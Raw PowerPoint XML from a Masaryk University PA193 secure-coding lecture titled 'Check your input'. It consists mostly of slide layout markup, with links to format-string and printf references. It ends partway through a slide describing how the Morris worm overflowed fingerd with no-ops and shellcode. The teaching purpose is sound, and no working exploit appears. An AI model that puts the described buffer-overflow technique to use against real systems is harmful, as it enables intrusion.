        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="616992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dirty="0"/>
              <a:t>Kliknutím lze upravit styl.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Zástupný symbol pro text 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="263691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a:t>Kliknutím lze upravit styly předlohy textu.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Zástupný symbol pro číslo snímku 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{DD79F762-72FB-4BD5-A818-29CDD2407363}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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64505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sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504000" y="1844824"/>
            <a:ext cx="3956248"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4648200" y="1844824"/>
            <a:ext cx="4038600"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číslo snímku 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{85ABBF9B-AC52-4328-A6CC-005355CCFABC}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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2543498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dirty="0"/>
              <a:t>Kliknutím lze upravit styl.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Zástupný symbol pro text 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518864" y="1916832"/>
            <a:ext cx="4040188"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518864" y="2556594"/>
            <a:ext cx="4040188"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text 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4706689" y="1916832"/>
            <a:ext cx="4041775"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4706689" y="2556594"/>
            <a:ext cx="4041775"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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A7CCC5A5-3949-4E74-A961-37142DFBFEA3}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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101548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číslo snímku 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FBA81E-0033-4F5D-AC30-6C12AA77AD2E}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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193313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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{458089DF-935D-4C65-A693-E2F32DF777D9}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3"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1735227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3008313" cy="984577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Kliknutím lze upravit styl.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Zástupný symbol pro obsah 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575050" y="764704"/>
            <a:ext cx="5111750" cy="5400601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="27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text 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1916831"/>
            <a:ext cx="3008313" cy="424847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fld id="{E1AD7FBD-95E5-4CA6-B15D-A4FD9550FFCB}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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114636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dirty="0"/>
              <a:t>Kliknutím lze upravit styl.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Zástupný symbol pro obrázek 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792288" y="1052735"/>
            <a:ext cx="5486400" cy="36748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fld id="{4871D363-618F-48EB-B3F6-7563ADE3F178}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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2942435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svislý text 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2700"/>
            </a:lvl1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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7714EDB3-ACD1-42BB-AA8F-6A31E9F8373B}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Zástupný symbol pro zápatí 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>I      </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3466553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P:\CRCS\2012_0178_Redesign_loga_a_JVS\PPT_prezentace\sablona\pracovni\normalni.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Zástupný symbol pro nadpis 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="503238" y="908050"/>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cs-CZ" altLang="cs-CZ"/>
              <a:t>Kliknutím lze upravit styl</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Zástupný symbol pro text 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="503238" y="1871663"/>
            <a:ext cx="8229600"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8" name="Zástupný symbol pro číslo snímku 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="6573838"/>
            <a:ext cx="396875" cy="284162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{10B03A19-ACCA-4B24-B6F6-CF5C3994296D}" type="slidenum">
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Zástupný symbol pro zápatí 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900113" y="6572250"/>
            <a:ext cx="2895600" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>I      </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483657" r:id="rId1"/>
    <p:sldLayoutId id="2147483656" r:id="rId2"/>
    <p:sldLayoutId id="2147483655" r:id="rId3"/>
    <p:sldLayoutId id="2147483654" r:id="rId4"/>
    <p:sldLayoutId id="2147483653" r:id="rId5"/>
    <p:sldLayoutId id="2147483652" r:id="rId6"/>
    <p:sldLayoutId id="2147483651" r:id="rId7"/>
    <p:sldLayoutId id="2147483650" r:id="rId8"/>
    <p:sldLayoutId id="2147483649" r:id="rId9"/>
    <p:sldLayoutId id="2147483658" r:id="rId10"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1" kern="1200">
          <a:solidFill>
            <a:srgbClr val="1E4485"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1">
          <a:solidFill>
            <a:srgbClr val="1E4485"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1">
          <a:solidFill>
            <a:srgbClr val="1E4485"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1">
          <a:solidFill>
            <a:srgbClr val="1E4485"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" b="1">
          <a:solidFill>
            <a:srgbClr val="1E4485"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="1E4485"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="1E4485"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="1E4485"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="1E4485"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="1E4485"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34"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anose="020B0604020202020204"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hyperlink" Target="http://www.eeye.com/eEyeDigitalSecurity/media/ResearchPapers/eeyeMRV-Oct2006.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.team-teso.net/articles/formatstring/" TargetMode="Externa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ms-help:/MS.MSDNQTR.2003FEB.1033/vclib/html/_crt_printf_width_specification.htm" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ms-help:/MS.MSDNQTR.2003FEB.1033/vclib/html/_crt_flag_directives.htm" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ms-help:/MS.MSDNQTR.2003FEB.1033/vclib/html/_crt_printf_type_field_characters.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ms-help:/MS.MSDNQTR.2003FEB.1033/vclib/html/_crt_precision_specification.htm"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descr="titulk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3175"/>
            <a:ext cx="9140825" cy="6854825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3074" name="Nadpis 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="476250"/>
            <a:ext cx="5754687" cy="1873250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check your input</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="Podnadpis 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="3284538"/>
            <a:ext cx="5724525" cy="1081087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1E4485"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PA193 – Secure coding</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="1E4485"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="Zástupný symbol pro text 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="5254625"/>
            <a:ext cx="5724525" cy="863600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4485"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Petr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1E4485"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Švenda</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4485"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lukáš Němec</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1E4485"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Faculty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4485"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1E4485"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4485"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1E4485"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Informatics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4485"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Masaryk University, Brno, CZ</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Morris worm </a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2400" dirty="0"/>
              <a:t>The worm used the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2400" dirty="0" err="1"/>
              <a:t>fingerd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2400" dirty="0"/>
              <a:t> service and as a username sent 512 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>noops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and 24 characters of shellcode.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The additional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>24 characters end up overwriting the system stack, which controls what functions are called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>next.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>It opens command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>interpreter which the worm then uses to pull itself </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>in the </a:t>
